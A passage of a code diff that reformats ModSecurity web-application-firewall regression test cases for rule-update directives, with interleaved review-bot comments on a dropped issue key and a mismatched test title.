@@ -1,272 +1,288 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (1/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (1/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code": 200, - "debug_log": "Skipped rule id '200005'" + "expected": { + "debug_log": "Skipped rule id '200005'", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"allow\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"allow\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (2/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (2/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (3/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (3/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code": 200, - "debug_log": "Running action: log" + "expected": { + "debug_log": "Running action: log", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"pass\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"pass\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (4/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (4/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code": 200, - "debug_log": "Running action: log" + "expected": { + "debug_log": "Running action: log", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"pass\"", - "SecDefaultAction \"phase:3,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"pass\"", + "SecDefaultAction \"phase:3,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (5/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (5/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code": 200, - "debug_log": "Dropping the evaluation of upcoming rules in favor of" + "expected": { + "debug_log": "Dropping the evaluation of upcoming rules in favor of", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"allow\"", - "SecDefaultAction \"phase:3,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"allow\"", + "SecDefaultAction \"phase:3,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (6/n)", - "issue":"2005", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (6/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ - "http_code": 302, - "error_log": "Access denied with code 302" + "expected": { + "error_log": "Access denied with code 302", + "http_code": 302 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"redirect:'https://%{request_headers.host}/'\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"redirect:'https://%{request_headers.host}/'\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block,deny\"" ] } ] - diff --git a/test/test-cases/regression/config-update-target-by-id.json b/test/test-cases/regression/config-update-target-by-id.json index 8faecaefe6..78d694ff17 100644 --- a/test/test-cases/regression/config-update-target-by-id.json +++ b/test/test-cases/regression/config-update-target-by-id.json 
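Review bot: The rewritten entry for "SecRuleUpdateActionById (6/n)" no longer carries `"issue":"2005"`; the old line is removed and nothing on the new side replaces it, so the redirect test loses its link to the report it was written for. If this rewrite is meant to change layout only (the commit message for this patch is not visible here), keep the key, e.g. `"issue": "2005",` after the `"title"` line. Separately, each request in this hunk still declares `"Content-Length": "330"` while the newly added `"body": [ "" ]` is empty. That is presumably harmless if the harness ignores the header, but dropping or correcting it would keep these cases from misleading anyone who later tests body-length handling.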
@@ -1,199 +1,214 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude whole collection", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude whole collection", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 !ARGS", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude using regex", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude using regex", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?mixpanel=value&mixpanel=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?mixpanel=value&mixpanel=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 !ARGS:/mixpanel$/", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude using full name", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude using full name", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?mixpanel=value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?mixpanel=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 !ARGS:mixpanel", "SecRule ARGS \"@contains value\" \"id:1,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (match)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (match)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?xxxyyy=value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?xxxyyy=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 \"!ARGS:/xxx/\"", "SecRule ARGS_NAMES \"@contains yyy\" \"id:1,phase:2,deny,status:403\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (no match)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (no match)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?xxyyy=value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?xxyyy=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 \"!ARGS:/xxx/\"", "SecRule ARGS_NAMES \"@contains yyy\" \"id:1,phase:2,deny,status:403\"" diff --git a/test/test-cases/regression/config-update-target-by-msg.json b/test/test-cases/regression/config-update-target-by-msg.json index 24fe343cd0..3cbf24568c 100644 --- a/test/test-cases/regression/config-update-target-by-msg.json +++ b/test/test-cases/regression/config-update-target-by-msg.json 
@@ -1,39 +1,42 @@
 [
 {
- "enabled":1,
- "version_min":300000,
- "title":"SecRuleUpdateTargetByTag",
- "client":{
- "ip":"200.249.12.31",
- "port":123
+ "enabled": 1,
+ "version_min": 300000,
+ "title": "SecRuleUpdateTargetByTag",
+ "client": {
+ "ip": "200.249.12.31",
+ "port": 123
 },
- "server":{
- "ip":"200.249.12.31",
- "port":80
+ "server": {
+ "ip": "200.249.12.31",
+ "port": 80
 },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*"
+ "request": {
+ "headers": {
+ "Host": "localhost",
+ "User-Agent": "curl/7.38.0",
+ "Accept": "*/*"
 },
- "uri":"/?key=value&key=other_value",
- "method":"GET"
+ "uri": "/?key=value&key=other_value",
+ "method": "GET",
+ "body": [
+ ""
+ ]
 },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
+ "response": {
+ "headers": {
+ "Date": "Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type": "text/html"
 },
- "body":[
+ "body": [
 "no need."
 ]
 },
- "expected":{
+ "expected": {
 "http_code": 200
 },
- "rules":[
+ "rules": [
 "SecRuleEngine On",
 "SecRuleUpdateTargetByMsg test !ARGS",
 "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,msg:'test',deny\""
diff --git a/test/test-cases/regression/config-update-target-by-tag.json b/test/test-cases/regression/config-update-target-by-tag.json
index 10d4c1b487..0ba5d96f4e 100644
--- a/test/test-cases/regression/config-update-target-by-tag.json
+++ b/test/test-cases/regression/config-update-target-by-tag.json
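Review bot: The `"title"` line is rewritten here but still reads `SecRuleUpdateTargetByTag`, while the rules in this case use `SecRuleUpdateTargetByMsg` and the file is config-update-target-by-msg.json. Since the line is being touched anyway, `"title": "SecRuleUpdateTargetByMsg",` would make a failing run point at the right directive. The closing lines of the test object fall outside the hunk.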
@@ -1,282 +1,303 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (1/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (1/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (2/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (2/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS:'/.*y$/'", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (3/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (3/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS:'/k.*/'", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (4/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (4/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." 
] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS:/ke/", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag Test (5/6) Regex with match anchored at beginning of Subject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&ref=something", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateTargetByTag test !ARGS:'/(?!ref)/'", - "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" - ] + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag Test (5/6) Regex with match anchored at beginning of Subject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value&ref=something", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" + }, + "body": [ + "no need." 
+ ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateTargetByTag test !ARGS:'/(?!ref)/'", + "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" + ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag Test (6/6) Regex with match anchored at beginning of Subject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&ref=something", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateTargetByTag test !ARGS:'/^ref/'", - "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" - ] + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag Test (6/6) Regex with match anchored at beginning of Subject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + 